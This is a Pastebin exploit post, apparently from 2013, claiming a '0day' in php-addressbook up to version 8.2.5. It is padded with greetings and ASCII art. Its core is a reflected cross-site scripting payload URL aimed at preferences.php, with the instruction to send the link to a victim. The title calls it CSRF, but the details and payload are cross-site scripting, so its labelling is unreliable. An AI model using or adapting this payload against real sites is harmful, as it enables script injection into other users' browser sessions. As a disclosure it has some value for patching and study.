API tools faq
paste
Advertisement
7days

php address book CSRF

7days
Jun 6th, 2013
67
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.70 KB | None | 0 0
raw download clone embed print report
  1. #########################################################################
  2.  
  3. [+] Exploit Title : php address book CSRF
  4. [+] Author : Pablo '7days' Riberio
  5. [+] Team: So Good Security
  6. [+] Other 0days : http://pastebin.com/u/7days
  7. [+] Version : <= 8.2.5
  8. [+] Tested on : windows/internet explorer
  9. [+] Details: Cross Scripting
  10. [+] Vendor: http://sourceforge.net/projects/php-addressbook/?source=directory
  11. #########################################################################
  12.  
  13. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  14. Gr33tz: Greg, Sonya from Mortal Kombat, the owner of the japanese steak creation factory,
  15. my home boy linus, all the cockneys and my grandma <3
  16. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  17. no thnx 2: microsoft, windoz, estate agents and recruiters
  18. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  19. `..`.:::.`
  20. .://o:::///:.
  21. `::+y+::::::/+/`
  22. :/++/::/:/--:+o:`
  23. `://:-:/-/:.-:/oo.
  24. `/-.-:::/o---::+o.
  25. ....-:/+hs::--:+o
  26. .``-//ohh+----:+.
  27. `.``-/+syhs:----/+`
  28. .-.`.-:+syyo:--.-:+/
  29. `---.`.-/+yo/:-----:+o.
  30. .::-...-:+/o/-.-----:+so`
  31. .-::-...-:::::-----:://osy:
  32. .::-....--:::----::/+ooosys-
  33. `:--.....-:/:::::/+osyyyyo:`
  34. ` `----...--:/++++oosyyhhy+-`
  35. :::::-------:::---..--:/+oossyyhhhhs/.
  36. ::::::-------:--.-.--:+osyyyhhhhho-`
  37. ------------.....--:/+oyyhhhhhy+.
  38. -----------...---:/+osyhhhhyo:`
  39. :::::-------:::/+osyyhhhhs/.
  40. ++++++++++++oossyyhhhhs/.
  41. sssssssyyyyhhhhhhhyo:.`
  42. ``..---..`
  43.  
  44. portuguese cyber army
  45. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  46. [+] Begin 0day
  47. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  48.  
  49. Send the user a link to this page to triger the issue:
  50. http://victim.com/preferences.php?from=%22%3E%3Cscript%3Ealert('7days');%3C/script%3E
  51.  
  52. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  53. [+] End 0day
  54. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!